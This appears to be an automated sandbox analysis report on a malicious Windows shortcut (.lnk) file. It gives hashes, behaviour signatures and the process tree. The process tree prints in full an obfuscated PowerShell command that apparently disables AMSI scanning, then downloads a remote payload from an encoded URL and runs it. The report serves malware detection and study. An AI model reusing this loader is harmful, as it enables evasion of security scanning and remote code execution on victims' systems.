Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
-
submitted
21-08-2024 19:35
General
-
Target
b4c1f7bca89ed610ae26479d56d43d76_JaffaCakes118.lnk
-
Size
3KB
-
MD5
b4c1f7bca89ed610ae26479d56d43d76
-
SHA1
a4b927418eb49d2c566d036a762d6eb76ff9c166
-
SHA256
323c7a857915fa3b161360d792afa19a6e410811ec07d5d7e716ccf1720bd3d8
-
SHA512
becc704d5d31ed86a600a164a5396d6c21794ad6be50054f4f6f00324f3b29b90ff7a2db14b189b72c203a8401310b04cda456f454a3d44bb7e9a32fa3a87069
Score
6/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\b4c1f7bca89ed610ae26479d56d43d76_JaffaCakes118.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -WindowStyle 1 $sw='HABRGGGCKJSCLRGIAZGNHDOKMZZHJTRCHOYBOEILVXKBXSUNTQIWFQQLBNNEKSHKHRHKMSGGYUNHQ';function lsbno($as){$kp=[Text.StringBuilder]::New();$hb=3;for($nx=0;$nx -lt $as.Length;$nx+=2){$lg=-join($as.Substring($nx,2)[1,0]);[void]$kp.Append([char]([System.Convert]::ToUInt16($lg,16)+$hb));};return $kp.ToString();};$cc=lsbno '0567071726A6B2A4E5B6E54626A626B617B2E32717C6A6E51766C6B6B2E3A607662517669607';$zy=lsbno 'E5A6076664B6661734E566962616';$yf=lsbno 'B4C6B6D427F5966606920517E5176606';try{[Ref].Assembly.GetType($cc).GetField($zy,$yf).SetValue($Null,$True)}catch{};;$gz='KKUAOIXVHNEAC';sal nt ($gz[5,10,6] -join(''));$rh=lsbno '561717D673C2C25666472717F6E51666B646B2C6F646C236669626F2A24353033323E263D223B2F566B6';$vr=[Net.WebRequest]::Create($rh);$ek=$vr.GetResponse();$vv=$ek.GetResponseStream();$yr=[IO.StreamReader]::New($vv);$ro=$yr.ReadToEnd() -replace '\r*\n','';nt((lsbno $ro));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB